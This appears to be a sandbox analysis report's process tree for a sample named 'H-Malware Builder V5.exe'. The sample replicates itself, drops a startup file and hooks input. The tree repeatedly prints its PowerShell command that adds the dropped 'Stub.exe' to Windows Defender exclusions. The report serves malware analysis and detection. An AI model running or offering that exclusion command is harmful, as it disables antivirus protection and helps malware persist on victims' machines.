        Suspicious use of SetWindowsHookEx
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        14⤵
        Checks computer location settings
        Drops startup file
        
        PID:5072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4844
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        15⤵
        Checks computer location settings
        Drops startup file
        
        PID:4820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4436
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        16⤵
        Checks computer location settings
        Drops startup file
        
        PID:3872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4672
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3476
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        17⤵
        Checks computer location settings
        Drops startup file
        
        PID:1928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        Suspicious use of SetWindowsHookEx
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        18⤵
        Checks computer location settings
        Drops startup file
        
        PID:2056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2456
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        19⤵
        Checks computer location settings
        Drops startup file
        
        PID:4556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:544
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        21⤵
        Suspicious use of SetWindowsHookEx
        
        PID:708
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        20⤵
        Checks computer location settings
        Drops startup file
        
        PID:4596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1004
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        21⤵
        Checks computer location settings
        Drops startup file
        
        PID:2648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1928
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        23⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1232
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        22⤵
        Checks computer location settings
        Drops startup file
        
        PID:2456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5084
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        23⤵
        Checks computer location settings
        Drops startup file
        
        PID:544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4556
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        
        PID:1492
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        24⤵
        Checks computer location settings
        Drops startup file
        
        PID:3852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:640
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        25⤵
        Checks computer location settings
        Drops startup file
        
        PID:2044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4468
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3784
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        26⤵
        Checks computer location settings
        Drops startup file
        
        PID:1956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1648
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        Suspicious use of SetWindowsHookEx
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        27⤵
        Checks computer location settings
        Drops startup file
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3740
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        28⤵
        Checks computer location settings
        Drops startup file
        
        PID:936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3832
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1996
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        29⤵
        Checks computer location settings
        Drops startup file
        
        PID:3044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3296
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        30⤵
        Checks computer location settings
        Drops startup file
        
        PID:2432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:932
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        32⤵
        Suspicious use of SetWindowsHookEx
        
        PID:232
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        31⤵
        Checks computer location settings
        Drops startup file
        
        PID:1620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4740
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4808
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        32⤵
        Checks computer location settings
        Drops startup file
        
        PID:4408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1612
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1004
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        33⤵
        Checks computer location settings
        Drops startup file
        
        PID:2708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3732
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        34⤵
        Checks computer location settings
        Drops startup file
        
        PID:5084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1732
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        36⤵
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        35⤵
        Checks computer location settings
        Drops startup file
        
        PID:2316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2008
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        37⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        36⤵
        Checks computer location settings
        Drops startup file
        
        PID:3616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3216
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        37⤵
        Checks computer location settings
        Drops startup file
        
        PID:4320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4832
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        39⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4360
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        38⤵
        Checks computer location settings
        Drops startup file
        
        PID:4468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1384
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        40⤵
        
        PID:4452
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        39⤵
        Checks computer location settings
        Drops startup file
        
        PID:1964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4696
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        41⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        40⤵
        Checks computer location settings
        Drops startup file
        
        PID:228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4368
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        42⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        41⤵
        Checks computer location settings
        Drops startup file
        
        PID:1484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4360
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        43⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        42⤵
        Checks computer location settings
        Drops startup file
        
        PID:2380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1384
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        44⤵
        
        PID:2532
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        43⤵
        Checks computer location settings
        Drops startup file
        
        PID:1880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:816
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        45⤵
        
        PID:2132
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        44⤵
        Checks computer location settings
        Drops startup file
        
        PID:1516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4916
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        46⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2936
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        45⤵
        Checks computer location settings
        Drops startup file
        
        PID:2584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4484
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        47⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1728
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        46⤵
        Checks computer location settings
        Drops startup file
        
        PID:5012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3084
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        48⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4644
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3084 -s 404
        48⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        47⤵
        Checks computer location settings
        
        PID:3920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2324
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        49⤵
        
        PID:4740
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        48⤵
        
        PID:2912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3820

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4092

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4204

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4332

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4668

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:5056

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1764

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:1092

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4760

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:3896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4816

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe ab072360762a6178cb11e28e974cd5a4 14EUe6vRW0GNH48FUj7QnA.0.1.0.0.0
1⤵
- Sets service image path in registry
PID:4536
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2496

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:2292

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2744

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Checks processor information in registry
PID:224

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:772

C:\Windows\System32\svchost.exe
